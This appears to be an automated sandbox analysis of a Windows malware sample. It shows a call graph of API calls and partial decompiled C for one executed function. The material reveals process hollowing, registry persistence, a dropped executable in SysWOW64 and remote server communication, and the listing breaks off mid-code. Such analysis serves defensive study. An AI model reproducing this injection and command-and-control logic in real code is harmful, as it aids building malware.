7104->7107 7105->7101 7106->7101 7109 12f3f2 __WSAFDIsSet 7106->7109 7108 12f39f closesocket 7107->7108 7108->7101 7109->7108 7110 12f403 ioctlsocket 7109->7110 7112 12f26d setsockopt setsockopt setsockopt setsockopt setsockopt 7110->7112 7112->7101 7114 12dd84 lstrcmpiA 7113->7114 7115 12c58e 7114->7115 7115->6962 7115->6968 7115->6970 7117 127dc8 InterlockedExchange 7116->7117 7118 127dc0 Sleep 7117->7118 7119 127dd4 7117->7119 7118->7117 7119->7003 7119->7005 7121 12e184 7120->7121 7122 12e2e4 7121->7122 7123 12e223 7121->7123 7136 12dfe2 7121->7136 7122->7031 7123->7122 7125 12dfe2 8 API calls 7123->7125 7129 12e23c 7125->7129 7126 12e1be 7126->7123 7127 12dbcf 3 API calls 7126->7127 7130 12e1d6 7127->7130 7128 12e21a CloseHandle 7128->7123 7129->7122 7140 12e095 RegCreateKeyExA 7129->7140 7130->7123 7130->7128 7131 12e1f9 WriteFile 7130->7131 7131->7128 7133 12e213 7131->7133 7133->7128 7134 12e2a3 7134->7122 7135 12e095 4 API calls 7134->7135 7135->7122 7137 12e024 7136->7137 7138 12dffc 7136->7138 7137->7126 7138->7137 7139 12db2e 8 API calls 7138->7139 7139->7137 7141 12e172 7140->7141 7144 12e0c0 7140->7144 7141->7134 7142 12e13d 7143 12e14e RegDeleteValueA RegCloseKey 7142->7143 7143->7141 7144->7142 7145 12e115 RegSetValueExA 7144->7145 7145->7142 7145->7144 7147 123122 InterlockedExchange 7146->7147 7148 12312e 7147->7148 7149 12310f GetTickCount 7147->7149 7148->7048 7149->7148 7150 12311a Sleep 7149->7150 7150->7147 7152 12f04e 4 API calls 7151->7152 7153 123a83 7152->7153 7155 123bc0 7153->7155 7158 123b66 lstrlenA 7153->7158 7159 123ac1 7153->7159 7154 123be6 7156 12ec2e codecvt 4 API calls 7154->7156 7155->7154 7157 12ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7155->7157 7156->7159 7157->7155 7158->7153 7158->7159 7159->7052 7159->7055 7160->7070 7161->7067 7163 126eef AllocateAndInitializeSid 7162->7163 7164 126f55 wsprintfA 7162->7164 7165 126f44 7163->7165 7166 126f1c CheckTokenMembership 7163->7166 7164->7073 7165->7164 7170 126e36 GetUserNameW 7165->7170 7167 126f3b FreeSid 7166->7167 7168 126f2e 7166->7168 7167->7165 7168->7167 7171 126e97 7170->7171 7172 126e5f LookupAccountNameW 7170->7172 7171->7164 7172->7171 7174 122419 4 API calls 7173->7174 7175 1224b6 7174->7175 7175->7088 7177 12dd79 lstrlenA 7176->7177 7177->6457 7179 12eb17 7178->7179 7180 12eb21 7178->7180 7181 12eae4 2 API calls 7179->7181 7180->6504 7181->7180 7184 1269b9 WriteFile 7182->7184 7186 126a3c 7184->7186 7187 1269ff 7184->7187 7185 126a10 WriteFile 7185->7186 7185->7187 7186->6500 7186->6501 7187->7185 7187->7186 7189 123ee2 7188->7189 7190 123edc 7188->7190 7189->6515 7191 126dc2 6 API calls 7190->7191 7191->7189 7193 12400b CreateFileA 7192->7193 7194 12402c GetLastError 7193->7194 7196 124052 7193->7196 7195 124037 7194->7195 7194->7196 7195->7196 7197 124041 Sleep 7195->7197 7196->6518 7197->7193 7197->7196 7199 123f4e GetLastError 7198->7199 7200 123f7c 7198->7200 7199->7200 7201 123f5b WaitForSingleObject GetOverlappedResult 7199->7201 7202 123f8c ReadFile 7200->7202 7201->7200 7203 123fc2 GetLastError 7202->7203 7204 123ff0 7202->7204 7203->7204 7205 123fcf WaitForSingleObject GetOverlappedResult 7203->7205 7204->6523 7204->6524 7205->7204 7207 121924 GetVersionExA 7206->7207 7207->6563 7209 12f0f1 7208->7209 7210 12f0ed 7208->7210 7211 12f0fa lstrlenA SysAllocStringByteLen 7209->7211 7212 12f119 7209->7212 7210->6595 7213 12f117 7211->7213 7214 12f11c MultiByteToWideChar 7211->7214 7212->7214 7213->6595 7214->7213 7216 121820 17 API calls 7215->7216 7217 1218f2 7216->7217 7218 1218f9 7217->7218 7232 121280 7217->7232 7218->6590 7220 121908 7220->6590 7245 121000 7221->7245 7223 121839 7224 121851 GetCurrentProcess 7223->7224 7225 12183d 7223->7225 7226 121864 7224->7226 7225->6581 7226->6581 7229 12920e 7227->7229 7231 129308 7227->7231 7228 1292f1 Sleep 7228->7229 7229->7228 7230 1292bf ShellExecuteA 7229->7230 7229->7231 7230->7229 7230->7231 7231->6590 7235 1212e1 ShellExecuteExW 7232->7235 7234 1216f9 GetLastError 7236 121699 7234->7236 7235->7234 7238 1213a8 7235->7238 7236->7220 7237 121570 lstrlenW 7237->7238 7238->7236 7238->7237 7238->7238 7239 1215be GetStartupInfoW 7238->7239 7240 1215ff CreateProcessWithLogonW 7238->7240 7244 121668 CloseHandle 7238->7244 7239->7238 7241 1216bf GetLastError 7240->7241 7242 12163f WaitForSingleObject 7240->7242 7241->7236 7242->7238 7243 121659 CloseHandle 7242->7243 7243->7238 7244->7238 7246 121023 7245->7246 7247 12100d LoadLibraryA 7245->7247 7249 1210b5 GetProcAddress 7246->7249 7265 1210ae 7246->7265 7247->7246 7248 121021 7247->7248 7248->7223 7250 1210d1 GetProcAddress 7249->7250 7251 12127b 7249->7251 7250->7251 7252 1210f0 GetProcAddress 7250->7252 7251->7223 7252->7251 7253 121110 GetProcAddress 7252->7253 7253->7251 7254 121130 GetProcAddress 7253->7254 7254->7251 7255 12114f GetProcAddress 7254->7255 7255->7251 7256 12116f GetProcAddress 7255->7256 7256->7251 7257 12118f GetProcAddress 7256->7257 7257->7251 7258 1211ae GetProcAddress 7257->7258 7258->7251 7259 1211ce GetProcAddress 7258->7259 7259->7251 7260 1211ee GetProcAddress 7259->7260 7260->7251 7261 121209 GetProcAddress 7260->7261 7261->7251 7262 121225 GetProcAddress 7261->7262 7262->7251 7263 121241 GetProcAddress 7262->7263 7263->7251 7264 12125c GetProcAddress 7263->7264 7264->7251 7265->7223 7267 12908d 7266->7267 7268 1290e2 wsprintfA 7267->7268 7269 12ee2a 7268->7269 7270 1290fd CreateFileA 7269->7270 7271 12911a lstrlenA WriteFile CloseHandle 7270->7271 7272 12913f 7270->7272 7271->7272 7272->6618 7272->6619 7274 12ee2a 7273->7274 7275 129794 CreateProcessA 7274->7275 7276 1297c2 7275->7276 7277 1297bb 7275->7277 7278 1297d4 GetThreadContext 7276->7278 7277->6630 7279 129801 7278->7279 7280 1297f5 7278->7280 7287 12637c 7279->7287 7281 1297f6 TerminateProcess 7280->7281 7281->7277 7283 129816 7283->7281 7284 12981e WriteProcessMemory 7283->7284 7284->7280 7285 12983b SetThreadContext 7284->7285 7285->7280 7286 129858 ResumeThread 7285->7286 7286->7277 7288 126386 7287->7288 7289 12638a GetModuleHandleA VirtualAlloc 7287->7289 7288->7283 7290 1263b6 7289->7290 7294 1263f5 7289->7294 7291 1263be VirtualAllocEx 7290->7291 7292 1263d6 7291->7292 7291->7294 7293 1263df WriteProcessMemory 7292->7293 7293->7294 7294->7283 7296 128791 7295->7296 7297 12879f 7295->7297 7298 12f04e 4 API calls 7296->7298 7299 1287bc 7297->7299 7301 12f04e 4 API calls 7297->7301 7298->7297 7300 12e819 11 API calls 7299->7300 7302 1287d7 7300->7302 7301->7299 7315 128803 7302->7315 7450 1226b2 gethostbyaddr 7302->7450 7305 1287eb 7307 12e8a1 30 API calls 7305->7307 7305->7315 7307->7315 7310 12e819 11 API calls 7310->7315 7311 1288a0 Sleep 7311->7315 7313 1226b2 2 API calls 7313->7315 7314 12f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 7314->7315 7315->7310 7315->7311 7315->7313 7315->7314 7316 12e8a1 30 API calls 7315->7316 7347 128cee 7315->7347 7355 12c4d6 7315->7355 7358 12c4e2 7315->7358 7361 122011 7315->7361 7396 128328 7315->7396 7316->7315 7318 124084 7317->7318 7319 12407d 7317->7319 7320 123ecd 6 API calls 7318->7320 7321 12408f 7320->7321 7322 124000 3 API calls 7321->7322 7323 124095 7322->7323 7324 124130 7323->7324 7325 1240c0 7323->7325 7326 123ecd 6 API calls 7324->7326 7330 123f18 4 API calls 7325->7330 7327 124159 CreateNamedPipeA 7326->7327 7328 124167 Sleep 7327->7328 7329 124188 ConnectNamedPipe 7327->7329 7328->7324 7331 124176 CloseHandle 7328->7331 7333 124195 GetLastError 7329->7333 7342 1241ab 7329->7342 7332 1240da 7330->7332 7331->7329 7334 123f8c 4 API calls 7332->7334 7335 12425e DisconnectNamedPipe 7333->7335 7333->7342 7336 1240ec 7334->7336 7335->7329 7337 124127 CloseHandle 7336->7337 7339 124101 7336->7339 7337->7324 7338 123f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 7338->7342 7340 123f18 4 API calls 7339->7340 7341 12411c ExitProcess 7340->7341 7342->7329 7342->7335 7342->7338 7343 123f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 7342->7343 7344 12426a CloseHandle CloseHandle 7342->7344 7343->7342 7345 12e318 23 API calls 7344->7345 7346 12427b 7345->7346 7346->7346 7348 128d02 GetTickCount 7347->7348 7349 128dae 7347->7349 7348->7349 7351 128d19 7348->7351 7349->7315 7350 128da1 GetTickCount 7350->7349 7351->7350 7354 128d89 7351->7354 7455 12a677 7351->7455 7458 12a688 7351->7458 7354->7350 7466 12c2dc 7355->7466 7359 12c2dc 12 API calls 7358->7359 7360 12c4ec 7359->7360 7360->7315 7362 122020 7361->7362 7363 12202e 7361->7363 7364 12f04e 4 API calls 7362->7364 7365 12204b 7363->7365 7366 12f04e 4 API calls 7363->7366 7364->7363 7367 12206e GetTickCount 7365->7367 7368 12f04e 4 API calls 7365->7368 7366->7365 7369 1220db GetTickCount 7367->7369 7380 122090 7367->7380 7371 122068 7368->7371 7370 122132 GetTickCount GetTickCount 7369->7370 7384 1220e7 7369->7384 7373 12f04e 4 API calls 7370->7373 7371->7367 7372 1220d4 GetTickCount 7372->7369 7375 122159 7373->7375 7374 12212b GetTickCount 7374->7370 7377 1221b4 7375->7377 7379 12e854 13 API calls 7375->7379 7376 122684 2 API calls 7376->7380 7381 12f04e 4 API calls 7377->7381 7383 12218e 7379->7383 7380->7372 7380->7376 7382 1220ce 7380->7382 7498 121978 7380->7498 7386 1221d1 7381->7386 7382->7372 7388 12e819 11 API calls 7383->7388 7384->7374 7389 121978 15 API calls 7384->7389 7390 122125 7384->7390 7488 122ef8 7384->7488 7387 1221f2 7386->7387 7391 12ea84 30 API calls 7386->7391 7387->7315 7392 12219c 7388->7392 7389->7384 7390->7374 7393 1221ec 7391->7393 7392->7377 7503 121c5f 7392->7503 7394 12f04e 4 API calls 7393->7394 7394->7387 7397 127dd6 6 API calls 7396->7397 7398 12833c 7397->7398 7399 126ec3 2 API calls 7398->7399 7425 128340 7398->7425 7400 12834f 7399->7400 7401 12835c 7400->7401 7405 12846b 7400->7405 7402 1273ff 17 API calls 7401->7402 7419 128373 7402->7419 7403 1285df 7406 128626 GetTempPathA 7403->7406 7417 128768 7403->7417 7429 128671 7403->7429 7404 12675c 21 API calls 7404->7403 7407 1284a7 RegOpenKeyExA 7405->7407 7422 128450 7405->7422 7418 128638 7406->7418 7409 12852f 7407->7409 7410 1284c0 RegQueryValueExA 7407->7410 7415 128564 RegOpenKeyExA 7409->7415 7432 1285a5 7409->7432 7412 128521 RegCloseKey 7410->7412 7413 1284dd 7410->7413 7411 1286ad 7414 128762 7411->7414 7416 127e2f 6 API calls 7411->7416 7412->7409 7413->7412 7423 12ebcc 4 API calls 7413->7423 7414->7417 7420 128573 RegSetValueExA RegCloseKey 7415->7420 7415->7432 7428 1286bb 7416->7428 7421 12ec2e codecvt 4 API calls 7417->7421 7417->7425 7418->7429 7419->7422 7419->7425 7430 1283ea RegOpenKeyExA 7419->7430 7420->7432 7421->7425 7422->7403 7422->7404 7427 1284f0 7423->7427 7424 12875b DeleteFileA 7424->7414 7425->7315 7427->7412 7431 1284f8 RegQueryValueExA 7427->7431 7428->7424 7436 1286e0 lstrcpyA lstrlenA 7428->7436 7584 126ba7 IsBadCodePtr 7429->7584 7430->7422 7433 1283fd RegQueryValueExA 7430->7433 7431->7412 7434 128515 7431->7434 7432->7422 7435 12ec2e codecvt 4 API calls 7432->7435 7437 12841e 7433->7437 7438 12842d RegSetValueExA 7433->7438 7439 12ec2e codecvt 4 API calls 7434->7439 7435->7422 7440 127fcf 64 API calls 7436->7440 7437->7438 7441 128447 RegCloseKey 7437->7441 7438->7441 7442 12851d 7439->7442 7443 128719 CreateProcessA 7440->7443 7441->7422 7442->7412 7444 12874f 7443->7444 7445 12873d CloseHandle CloseHandle 7443->7445 7446 127ee6 64 API calls 7444->7446 7445->7417 7447 128754 7446->7447 7448 127ead 6 API calls 7447->7448 7449 12875a 7448->7449 7449->7424 7451 1226fb 7450->7451 7452 1226cd 7450->7452 7451->7305 7453 1226e1 inet_ntoa 7452->7453 7454 1226de 7452->7454 7453->7454 7454->7305 7461 12a63d 7455->7461 7457 12a685 7457->7351 7459 12a63d GetTickCount 7458->7459 7460 12a696 7459->7460 7460->7351 7462 12a645 7461->7462 7463 12a64d 7461->7463 7462->7457 7464 12a66e 7463->7464 7465 12a65e GetTickCount 7463->7465 7464->7457 7465->7464 7483 12a4c7 GetTickCount 7466->7483 7469 12c47a 7474 12c4d2 7469->7474 7475 12c4ab InterlockedIncrement CreateThread 7469->7475 7470 12c300 GetTickCount 7472 12c337 7470->7472 7471 12c326 7471->7472 7473 12c32b GetTickCount 7471->7473 7472->7469 7476 12c363 GetTickCount 7472->7476 7473->7472 7474->7315 7475->7474 7477 12c4cb CloseHandle 7475->7477 7476->7469 7478 12c373 7476->7478 7477->7474 7479 12c378 GetTickCount 7478->7479 7480 12c37f 7478->7480 7479->7480 7481 12c43b GetTickCount 7480->7481 7482 12c45e 7481->7482 7482->7469 7484 12a4f7 InterlockedExchange 7483->7484 7485 12a500 7484->7485 7486 12a4e4 GetTickCount 7484->7486 7485->7469 7485->7470 7485->7471 7486->7485 7487 12a4ef Sleep 7486->7487 7487->7484 7511 122d21 GetModuleHandleA 7488->7511 7491 122f06 7520 122df2 GetModuleHandleA 7491->7520 7492 122f14 7494 122684 2 API calls 7492->7494 7496 122f1d 7494->7496 7496->7384 7497 122f1f 7497->7384 7499 12f428 14 API calls 7498->7499 7500 12198a 7499->7500 7501 121990 closesocket 7500->7501 7502 121998 7500->7502 7501->7502 7502->7380 7504 121c80 7503->7504 7505 121cc2 wsprintfA 7504->7505 7506 121d1c 7504->7506 7509 121d79 7504->7509 7507 122684 2 API calls 7505->7507 7508 121d47 wsprintfA 7506->7508 7507->7504 7510 122684 2 API calls 7508->7510 7509->7377 7510->7509 7512 122d46 LoadLibraryA 7511->7512 7513 122d5b GetProcAddress 7511->7513 7512->7513 7515 122d54 7512->7515 7514 122d6b DnsQuery_A 7513->7514 7513->7515 7514->7515 7516 122d7d 7514->7516 7515->7491 7515->7492 7516->7515 7517 122d97 GetProcessHeap HeapAlloc 7516->7517 7517->7515 7519 122dac 7517->7519 7518 122db5 lstrcpynA 7518->7519 7519->7516 7519->7518 7521 122e10 LoadLibraryA 7520->7521 7522 122e0b 7520->7522 7523 122e17 7521->7523 7522->7521 7522->7523 7524 122ef1 7523->7524 7525 122e28 GetProcAddress 7523->7525 7524->7492 7524->7497 7525->7524 7526 122e3e GetProcessHeap HeapAlloc 7525->7526 7527 122e62 7526->7527 7527->7524 7528 122ede GetProcessHeap HeapFree 7527->7528 7529 122e7f htons inet_addr 7527->7529 7530 122ea5 gethostbyname 7527->7530 7532 122ceb 7527->7532 7528->7524 7529->7527 7529->7530 7530->7527 7534 122cf2 7532->7534 7535 122d1c 7534->7535 7536 122d0e Sleep 7534->7536 7537 122a62 GetProcessHeap HeapAlloc 7534->7537 7535->7527 7536->7534 7536->7535 7538 122a92 7537->7538 7539 122a99 socket 7537->7539 7538->7534 7540 122cd3 GetProcessHeap HeapFree 7539->7540 7541 122ab4 7539->7541 7540->7538 7541->7540 7555 122abd 7541->7555 7542 122adb htons 7557 1226ff 7542->7557 7544 122b04 select 7544->7555 7545 122cb3 GetProcessHeap HeapFree closesocket 7545->7538 7546 122b3f recv 7546->7555 7547 122b66 htons 7548 122ca4 7547->7548 7547->7555 7548->7545 7549 122b87 htons 7549->7548 7549->7555 7552 122bf3 GetProcessHeap HeapAlloc 7552->7555 7553 122c17 htons 7572 122871 7553->7572 7555->7542 7555->7544 7555->7545 7555->7546 7555->7547 7555->7548 7555->7549 7555->7552 7555->7553 7556 122c4d GetProcessHeap HeapFree 7555->7556 7564 122923 7555->7564 7576 122904 7555->7576 7556->7555 7558 12271d 7557->7558 7559 122717 7557->7559 7561 12272b GetTickCount htons 7558->7561 7560 12ebcc 4 API calls 7559->7560 7560->7558 7562 1227cc htons htons sendto 7561->7562 7563 12278a 7561->7563 7562->7555 7563->7562 7565 122944 7564->7565 7567 12293d 7564->7567 7580 122816 htons 7565->7580 7567->7555 7568 122871 htons 7571 122950 7568->7571 7569 1229bd htons htons htons 7569->7567 7570 1229f6 GetProcessHeap HeapAlloc 7569->7570 7570->7567 7570->7571 7571->7567 7571->7568 7571->7569 7573 1228e3 7572->7573 7575 122889 7572->7575 7573->7555 7574 1228c3 htons 7574->7573 7574->7575 7575->7573 7575->7574 7577 122921 7576->7577 7578 122908 7576->7578 7577->7555 7579 122909 GetProcessHeap HeapFree 7578->7579 7579->7577 7579->7579 7581 12286b 7580->7581 7582 122836 7580->7582 7581->7571 7582->7581 7583 12285c htons 7582->7583 7583->7581 7583->7582 7585 126bc0 7584->7585 7586 126bbc 7584->7586 7587 12ebcc 4 API calls 7585->7587 7588 126bd4 7585->7588 7586->7411 7589 126be4 7587->7589 7588->7411 7589->7588 7590 126c07 CreateFileA 7589->7590 7591 126bfc 7589->7591 7593 126c34 WriteFile 7590->7593 7594 126c2a 7590->7594 7592 12ec2e codecvt 4 API calls 7591->7592 7592->7588 7596 126c5a CloseHandle 7593->7596 7597 126c49 CloseHandle DeleteFileA 7593->7597 7595 12ec2e codecvt 4 API calls 7594->7595 7595->7588 7598 12ec2e codecvt 4 API calls 7596->7598 7597->7594 7598->7588 8069 125029 8074 124a02 8069->8074 8075 124a12 8074->8075 8077 124a18 8074->8077 8076 12ec2e codecvt 4 API calls 8075->8076 8076->8077 8078 124a26 8077->8078 8079 12ec2e codecvt 4 API calls 8077->8079 8080 124a34 8078->8080 8081 12ec2e codecvt 4 API calls 8078->8081 8079->8078 8081->8080

                                                                                Executed Functions

                                                                                Function 0012C913 Relevance: 113.4, APIs: 45, Strings: 19, Instructions: 1397filestringprocessCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E0012C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				CHAR* _t444;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t480;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				signed char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t635;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				CHAR* _t701;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				signed char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				signed char* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;
				intOrPtr _t819;
				signed int _t820;
				intOrPtr _t821;
				signed int _t822;
				CHAR* _t823;

				_v64 = 0;
				_v68 = 0;
				_t819 =  *0x13366c; // 0x132058
				if(_t819 == 0) {
					L2:
					E0012C517();
					L3:
					_t821 =  *0x13366c; // 0x132058
					if(_t821 == 0) {
						L21:
						__eflags = 0;
						return 0;
					}
					_t822 =  *0x133670; // 0x2
					if(_t822 == 0) {
						goto L21;
					}
					 *0x132104 = E0012E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x13210c = E0012E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0012E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x132108 = _t362;
					_t823 =  *0x1336b0; // 0x3e00000
					if(_t823 != 0) {
						L7:
						_t747 =  *0x133674; // 0x0
						_t688 =  *0x13366c; // 0x132058
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0012F428(E00122684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0012F43E(_t368,  &_v640, 0xc8, 0); // executed
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00128F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x133684 = 1;
									 *0x133678 = 0;
									 *0x13367c = 0;
									E0012EA84(1, "localcfg", "ip", _v496);
									_v104 = E0012F04E(0);
									_v100 = _t748;
									E0012EA84(1, "localcfg", "srv_time", _v492);
									E0012EA84(1, "localcfg", "local_time", _v104);
									E00128FB6( &_v440,  &_v640);
									E00128FB6( &_v92,  &_v640);
									E0012EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0012C65C(_v16,  &_v640,  &_v92, 0x132118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x132148 = 0;
										 *0x13215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0012C75D(_v16,  &_v640,  &_v440,  *0x1336b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x13215c);
														if( *(_t789 + 0x13215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0012F1ED(_t789,  &_v96, 0xa);
																E0012E654(E00128C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x1336b0; // 0x3e00000
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t758 = _v8[0x133300];
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x1336b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
																					_t413 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x1336b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E00127DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0012F04E(0);
																		__eflags =  *0x1336ac - _t748; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x1321a4; // 0x30800
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x1336b0; // 0x3e00000
																				 *_t418 = 0;
																				_t733 =  *0x1321a4; // 0x30800
																				_t418[4] = _t733;
																				_t734 =  *0x1322d4; // 0x348c26af
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0012C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x1322d4 = E001224C2(_t791, _v72, 0);
																				 *0x1321a4 = _v72;
																				E0012EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x1321a4; // 0x30800
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x1336a8 - _t417; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0012E854(1, "localcfg", "except_info",  *0x1336b0, 0x100000, 0x130264);
																	_t428 =  *0x1336b0; // 0x3e00000
																	_t811 = _t811 + 0x18;
																	_t304 =  &(_t428[1]); // 0x3e00001
																	_t736 = _t304;
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
